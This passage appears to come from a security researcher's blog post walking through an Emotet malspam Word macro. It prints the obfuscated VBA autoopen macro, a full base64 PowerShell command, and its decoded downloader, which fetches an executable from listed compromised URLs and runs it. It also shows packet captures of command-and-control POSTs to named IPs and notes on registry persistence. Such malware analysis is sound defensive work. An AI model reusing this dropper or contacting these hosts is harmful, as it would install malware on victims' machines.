Throughout the script, there are calls to the function ‘ugCunPaK’ which also passes a parameter (sTzHXsUeNU). All this function is doing is taking what is passed to it and saying to look for it in the “Comments” tab in the Word file. For example when working through this line of the script:<\/p>\n
\r\nCreateObject(uMvWKNsFzRd + ugCunPaK("hafbyEHH") + ugCunPaK("gsbuMzRpUVs")).Run$ dZmAMvagz<\/pre>\n
The “uMvWKNsFzRd” function is being called which runs this line of code:<\/p>\n
\r\nuMvWKNsFzRd = ugCunPaK("FEdDZxrN") + ugCunPaK("eZumagfGLaB") + ugCunPaK("tAxtxcsvzy")<\/pre>\n
The code then calls the “ugCunPaK” function and passes “FEdDZxrN,” “eZumagfGLaB,” and “tAxtxcsvzy” as parameters. When the “ugCunPaK” function is called, it looks up the values “FEdDZxrN,” “eZumagfGLaB,” and “tAxtxcsvzy” in the comments of the Word file which translates to ‘Wscript.’. It then passes back to the GnLpEPBGuvx function and proceeds to do the same thing again just using “hafbyEHH,” and “gsbuMzRpUVs” as the parameters that get passed. <\/p>\n
After several times of doing this throughout the script, we get the following cleaned up script:<\/p>\n
\r\nSub autoopen()\r\n\tGnLpEPBGuvx\r\nEnd Sub\r\n\r\nPublic Function GnLpEPBGuvx()\r\n\tCreateObject(Wscript. ugCunPaK("SH") + ugCunPaK("ell")).Run$ dZmAMvagz\r\nEnd Function\r\n\r\nPublic Function dZmAMvagz()\r\n\tfbtDPfDett = ugCunPaK("l") + ugCunPaK("-") + ugCunPaK("e") + ugCunPaK(" ")\r\n\tamRFZWXULCs = ugCunPaK("p") + ugCunPaK("o") + ugCunPaK("we") + ugCunPaK("rsh") + ugCunPaK("el")\r\n\tSekyzxBsr = powershel + l-e \r\n\tdZmAMvagz = powershell-e  + JAB7AHcAYABzAEMAUgBgAEkAUABUAH0AIAA9ACAALgAoACIAewAxAH0AewAwAH0AewAyAH0AIgAgAC0AZgAgACcAbwBiAGoAZQBjACcALAAnAG4AZQB3AC0AJwAsACcAdAAnACkAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAKAAiAHsANAB9AHsAMAB9AHsAMwB9AHsAMgB9AHsAMQB9ACIALQBmACcAcgBpAHAAJwAsACcAUwBoAGUAbABsACcALAAnAC4AJwAsACcAdAAnACwAJwBXAFMAYwAnACkAOwAkAHsAVwBFAEIAYwBgAGwAaQBFAGAATgBUAH0AIAA9ACAALgAoACIAewAzAH0AewAyAH0AewAwAH0AewAxAH0AIgAtAGYAIAAnAGoAZQAnACwAJwBjAHQAJwAsACcAZQB3AC0AbwBiACcALAAnAG4AJwApACAAKAAiAHsAMwB9AHsAMgB9AHsAMAB9AHsANAB9AHsAMQB9ACIAIAAtAGYAIAAnAHQAJwAsACcAdAAnACwAJwAuAE4AZQAnACwAJwBTAHkAcwB0AGUAbQAnACwAJwAuAFcAZQBiAEMAbABpAGUAbgAnACkAOwAkAHsAUgBBAG4AYABkAGAATwBtAH0AIAA9ACAALgAoACIAewAwAH0AewAyAH0AewAxAH0AIgAtAGYAJwBuAGUAJwAsACcALQBvAGIAagBlAGMAdAAnACwAJwB3ACcAKQAgACgAIgB7ADEAfQB7ADAAfQB7ADIAfQAiAC0AZgAgACcAbwAnACwAJwByAGEAbgBkACcALAAnAG0AJwApADsAJAB7AHUAYABSAEwAUwB9ACAAPQAgACgAIgB7ADAAfQB7ADEANwB9AHsAMgAwAH0AewAzADAAfQB7ADIAOAB9AHsAMgA5AH0AewAzAH0AewAxADEAfQB7ADEANQB9AHsAMgAzAH0AewAyADEAfQB7ADIANQB9AHsAMQA2AH0AewAyAH0AewA3AH0AewAxADMAfQB7ADEAMgB9AHsAMgA3AH0AewAxADAAfQB7ADQAfQB7ADEAOQB9AHsAMQB9AHsAMgA0AH0AewA1AH0AewA5AH0AewAxADgAfQB7ADEANAB9AHsANgB9AHsAMgA2AH0AewAyADIAfQB7ADgAfQAiACAALQBmACAAJwBoACcALAAnAG0ALwBKAGwAVAAnACwAJwByAGUAYgAuAGMAbwBtAC8AUwBPACcALAAnAHkAJwAsACcAaABvAGMAbwBtAHAAcgBvAC4AYwAnACwAJwB0AHAAOgAvAC8AbwBrAGkAZQAnACwAJwBoAEMAZwBHAE8ALwAsAGgAdAB0AHAAOgAvAC8AcQBkAGUAYwBpAHMAaQBvAG4AcwAuAGMAbwBtACcALAAnAGcAaABWAFMALwAsACcALAAnAHoALwAnACwAJwBtAGIAbwBjAGkAJwAsACcALwAvACcALAAnAC8AYwBhAHAAYQBjAGkAdABhAGMAaQAnACwAJwB0ACcALAAnAGgAJwAsACcAbgBhAC4AcABsAC8AaQAnACwAJwBvAG4ALwBiACcALAAnAGUAJwAsACcAdAB0AHAAOgAvAC8AdwBlACcALAAnAGEAJwAsACcAbwAnACwAJwByAG4AZQAnACwAJwBMAFQAJwAsACcATAByAHcAagAnACwAJwBNACcALAAnAHMAegBXAC8ALABoAHQAJwAsACcAQgByAGMASQBFAC8ALABoAHQAdABwADoALwAvAHYAJwAsACcALwAnACwAJwB0AHAAOgAnACwAJwBlAGkAbQAuAGMAJwAsACcAbwBtAC4AdQAnACwAJwByAGIAZQByAG4AaAAnACkALgAoACIAewAwAH0AewAxAH0AIgAtAGYAJwBTAHAAbABpACcALAAnAHQAJwApAC4ASQBuAHYAbwBrAGUAKAAnACwAJwApADsAJAB7AG4AYQBgAE0AZQB9ACAAPQAgACQAewBSAEEATgBEAGAATwBtAH0ALgAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAgACcAeAB0ACcALAAnAG4AZQAnACkALgBJAG4AdgBvAGsAZQAoADEALAAgADYANQA1ADMANgApADsAJAB7AFAAYQBgAFQASAB9ACAAPQAgACQAewBlAGAATgB2ADoAdABFAE0AUAB9ACAAKwAgACcAXAAnACAAKwAgACQAewBuAEEAYABtAEUAfQAgACsAIAAoACIAewAxAH0AewAwAH0AIgAtAGYAJwBlAHgAZQAnACwAJwAuACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAHsAdQBgAFIAbAB9ACAAaQBuACAAJAB7AFUAcgBgAGwAUwB9ACkAewB0AHIAeQB7ACQAewB3AEUAYgBgAEMAbABpAEUAYABOAHQAfQAuACgAIgB7ADIAfQB7ADAAfQB7ADMAfQB7ADEAfQAiACAALQBmACAAJwBsACcALAAnAEYAaQBsAGUAJwAsACcARABvAHcAbgAnACwAJwBvAGEAZAAnACkALgBJAG4AdgBvAGsAZQAoACQAewBVAGAAUgBMAH0ALgAoACIAewAwAH0AewAxAH0AIgAtAGYAJwBUACcALAAnAG8AUwB0AHIAaQBuAGcAJwApAC4ASQBuAHYAbwBrAGUAKAApACwAIAAkAHsAcABBAGAAVABIAH0AKQA7AC4AKAAiAHsAMAB9AHsAMQB9AHsAMgB9ACIALQBmACcAUwB0AGEAcgB0AC0AUAByACcALAAnAG8AYwBlACcALAAnAHMAcwAnACkAIAAkAHsAcABgAEEAdABIAH0AOwBiAHIAZQBhAGsAOwB9AGMAYQB0AGMAaAB7AC4AKAAiAHsAMAB9AHsAMgB9AHsAMQB9ACIAIAAtAGYAJwB3AHIAaQB0AGUALQBoACcALAAnAHMAdAAnACwAJwBvACcAKQAgACQAewBfAH0ALgAiAEUAeABjAEUAUAB0AGAAaQBgAE8AbgAiAC4AIgBtAEUAcwBTAGAAQQBHAGUAIgA7AH0AfQANAAoA\r\nEnd Function<\/pre>\n
So the line above found within the comments field is nothing more than a long base64 encoded string that looks like this when decoded:<\/p>\n
\r\n${w`sCR`IPT} = .("{1}{0}{2}" -f 'objec','new-','t') -ComObject ("{4}{0}{3}{2}{1}"-f'rip','Shell','.','t','WSc');\r\n${WEBc`liE`NT} = .("{3}{2}{0}{1}"-f 'je','ct','ew-ob','n') ("{3}{2}{0}{4}{1}" -f 't','t','.Ne','System','.WebClien');\r\n${RAn`d`Om} = .("{0}{2}{1}"-f'ne','-object','w') ("{1}{0}{2}"-f 'o','rand','m');\r\n${u`RLS} = ("{0}{17}{20}{30}{28}{29}{3}{11}{15}{23}{21}{25}{16}{2}{7}{13}{12}{27}{10}{4}{19}{1}{24}{5}{9}{18}{14}{6}{26}{22}{8}" -f 'h','m\/JlT','reb.com\/SO','y','hocompro.c','tp:\/\/okie','hCgGO\/,http:\/\/qdecisions.com','ghVS\/,','z\/','mboci','\/\/','\/capacitaci','t','h','na.pl\/i','on\/b','e','ttp:\/\/we','a','o','rne','LT','Lrwj','M','szW\/,ht','BrcIE\/,http:\/\/v','\/','tp:','eim.c','om.u','rbernh').("{0}{1}"-f'Spli','t').Invoke(',');\r\n${na`Me} = ${RAND`Om}.("{1}{0}" -f 'xt','ne').Invoke(1, 65536);\r\n${Pa`TH} = ${e`Nv:tEMP} + '\\' + ${nA`mE} + ("{1}{0}"-f'exe','.');foreach(${u`Rl} in ${Ur`lS}){try{${wEb`CliE`Nt}.("{2}{0}{3}{1}" -f 'l','File','Down','oad').Invoke(${U`RL}.("{0}{1}"-f'T','oString').Invoke(), ${pA`TH});.("{0}{1}{2}"-f'Start-Pr','oce','ss') ${p`AtH};break;}catch{.("{0}{2}{1}" -f'write-h','st','o') ${_}."ExcEPt`i`On"."mEsS`AGe";}}<\/pre>\n
The above encoded block may look odd, but it is another way of encoding a powershell command using base64 while also using the format operator (http:\/\/ss64.com\/ps\/syntax-f-operator.html). The ‘-f’ operator allows placeholders to be used in the powershell script and how to then place them into the script. For example:<\/p>\n
\r\n"{1}{0}{2}" -f objec,new-,t --> 0 = objec | 1 = new- | 2 = t ==> new-object<\/pre>\n
So walking through the script knowing this, you get the following:<\/p>\n
\r\n${wsCRIPT} = .(new-object) --ComObject (Wscript.Shell);\r\n${WEBcliENT} = .(new-object) (System.Net.Webclient);\r\n${RAndOm} = .(new-object) (random);\r\n${uRLS} = ( = http:\/\/wernerbernheim.com.uy\/capacitacion\/bMLTBrcIE\/ http:\/\/vereb.com\/SOghVS\/ http:\/\/hocompro.com\/JlTszW\/ http:\/\/okie\r\nmbociana.pl\/ihCgGO\/ http:\/\/qdecisions.com\/Lrwjz\/).Split.Invoke(,);\r\n${naMe} = ${RANDOm}.(next).Invoke(1, 65536);\r\n${PaTH} = ${eNv:tEMP} + \\ + ${nAmE} + (.exe);\r\n\tforeach(${uRl} in ${UrlS})\r\n\t\t{\r\n\t\t\ttry {${wEbCliENt}.(FileDownload).Invoke(${URL}.("ToString).Invoke(), ${pATH});\r\n\t\t\t.("Start-Process) ${pAtH};break;}\r\n\t\t\tcatch {.("write-host) ${_}."ExcEPtiOn"."mEsSAGe";}\r\n\t\t}<\/pre>\n
The faster way to decode the above script instead of doing it manually is to use Powersehll itself. In order to do this, take one of the lines above, for example the one for “${w`sCR`IPT}” and type the following at the Powershell prompt: “write-host ${w`sCR`IPT} = .(“{1}{0}{2}” -f ‘objec’,’new-‘,’t’) -ComObject (“{4}{0}{3}{2}{1}”-f’rip’,’Shell’,’.’,’t’,’WSc’);” minus the quotes as seen below:<\/p>\n
\"\"<\/a><\/p>\n
Note: I didn’t know about the above method until I read @dvk01uk’s post. Thanks for the tip dvk01uk!<\/p>\n
Analysis:
\n=========
\nFrom the network traffic perspective, once the maldoc is run, there is the initial call to the site ‘wernerbernheim[.]com[.]uy\/capacitacion\/bMLTBrcIE\/’ to download the malicious binary:<\/p>\n
\r\nGET \/capacitacion\/bMLTBrcIE\/ HTTP\/1.1\r\nHost: wernerbernheim.com.uy\r\nConnection: Keep-Alive\r\n\r\nHTTP\/1.1 200 OK\r\nCache-Control: no-cache, no-store, max-age=0, must-revalidate\r\nPragma: no-cache\r\nContent-Type: application\/octet-stream\r\nServer: Microsoft-IIS\/8.5\r\nContent-Disposition: attachment; filename="GVhZFRnuDfWvPO.exe"\r\nContent-Transfer-Encoding: binary\r\nX-Powered-By: ASP.NET\r\nX-Powered-By-Plesk: PleskWin\r\nDate: Fri, 25 Aug 2017 11:54:24 GMT\r\nContent-Length: 86016\r\n\r\nMZ......................@.............................................\t.!..L.!This program cannot be run in DOS mode.\r\n\r\n$.........d=..<\/pre>\n
which is saved to the %TEMP% directory of the system. Next, from what I can piece together from the separate runs of the malware and the ensuing PCAPs, the malicious binary that was downloaded then starts calling out in the form of POST requests using both port 443 (not HTTPS though), and port 8080:<\/p>\n
\r\nPOST \/ HTTP\/1.1\r\nUser-Agent: Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident\/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)\r\nHost: 62.39.95.185:443\r\nContent-Length: 500\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nQ7.....b..).....s......O.....ty.\r\n............I.Q*4s4..O!...jg......vt.>..s%G0n.......2.V......n..o%EJwI.7MT.f...QY-.k...U...!v..............cq..;.......LTA...84.Gkk.K....@....n...p\r\nVy......]OLE..O.~..1 ....6,.t.`.........Q*D..H($..` W....{............0.:.)........|.[.NEN.....{.[.VH$........."..`.7Vt.17.:1.......%\r\n..N_..B...OH..\r\n..X..o.\/...{.....).....l.t..W......Eb..l.e..g....n...2c......J..3........>Hv4...r.d.._h.......$.|.W4.$e.X.U*..GI3Sd.Y.4C.{..wXC.............9...[\/.J.>4=..+....y....*C..v.\r\n\r\nHTTP\/1.1 404 Not Found\r\nServer: nginx\r\nDate: Fri, 25 Aug 2017 11:56:30 GMT\r\nContent-Type: text\/html; charset=UTF-8\r\nContent-Length: 132\r\nConnection: keep-alive\r\n\r\n.)I..,.....{_n..b...SMh..q).H......)KyC.P.8J.Z...zdm.g\/]2.E..n\r\n...:.Q.\t.....=>~.....d..1..t..{.HEZ..{.C|...D...[.r.[7..PwQ...|.c..!.\r\n\r\n-----\r\n\r\nPOST \/ HTTP\/1.1\r\nUser-Agent: Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident\/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)\r\nHost: 104.236.252.178:8080\r\nContent-Length: 516\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n..c..\r\n. \\..r.hm.........1.t.F.ee.~....E#1w....qD...{\r\n\t......\r\n.......?j..~..}.....].d...,....j..\r\n..:%H+X....cD.\/`<rb.....b...8....}........)!....9.G..a..dz..Y..~...dl.....v.....u.3-"....K$... ...".nT...az,Rt...@.._T8.@m..\t..t-.....d...Ew.Vm.rX..<..T......Q...]...G.\/...5......G..k...C.&#ePi.e..#..|.fL|...].L.-..6.....E.wB....p..e)u....Zr)A_.\\Y.K.,X..(........oGi.....FwE..j(..?..Y.&.\t.\r\n.HT..%y...6..IU.....od..T.T?..YZFL......]|o.YC*....s..*..8.R:.....[,.0.RZ<!:...k..2...Sp...[S...^...\t.T0?r...3......7..8_...o.....\r\n\r\nHTTP\/1.1 404 Not Found\r\nServer: nginx\r\nDate: Mon, 28 Aug 2017 09:04:05 GMT\r\nContent-Type: text\/html; charset=UTF-8\r\nContent-Length: 132\r\nConnection: keep-alive\r\n\r\n.)I..,.....{_n..b...SMh..q).H......)KyC.P.8J.Z...zdm.g\/]2.E..n\r\n...:.Q.\t.....=>~.....d..1..t..{.HEZ..{.C|...D...[.r.[{.......<.>..e..<\/pre>\n
From the host perspective, this is pretty straight forward. The file “GVhZFRnuDfWvPO.exe” executes itself, and spawns another copy of itself in the same location. This instance of “GVhZFRnuDfWvPO.exe” then proceeds to perform a SetRenameInformationFile operation and creates the file “serviceprov.exe” which is the same file as “GVhZFRnuDfWvPO.exe” but now in a new location – C:\\Users\\%username%\\AppData\\Local\\Microsoft\\Windows. This initial instance proceeds to spawn another copy of itself and is the process that is responsible for the POST commands seen above in the PCAP.<\/p>\n
\"\"<\/a><\/p>\n
Also looking into the ProcMon log, I can see that it is this process that is looking through different folders within my VM (ie: Windows History, cookies, etc…). Lastly we see that the process writes itself to the registry to establish persistence: <\/p>\n
\"\"<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"
For today’s post, I am walking through an Emotet malspam that we received this past Friday that contained a simple link that lead to a macro enabled Word document. Googling around I see that @dvk01uk came across the same URLs 5 days ago. You can read that post here. Running the maldoc in my test VM showed that the initial link was still working and downloaded an executable. When running that executable on my test VM, I saw a couple of POST requests going to dead sites. First I will walk through the script that I deobfuscated and then the…<\/p>\n
 Continue reading<\/span><\/i><\/a> <\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[10,4],"tags":[12],"class_list":["post-938","post","type-post","status-publish","format-standard","hentry","category-code","category-packet-analysis","tag-emotet"],"_links":{"self":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/938","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=938"}],"version-history":[{"count":4,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/938\/revisions"}],"predecessor-version":[{"id":948,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/938\/revisions\/948"}],"wp:attachment":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=938"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=938"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=938"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}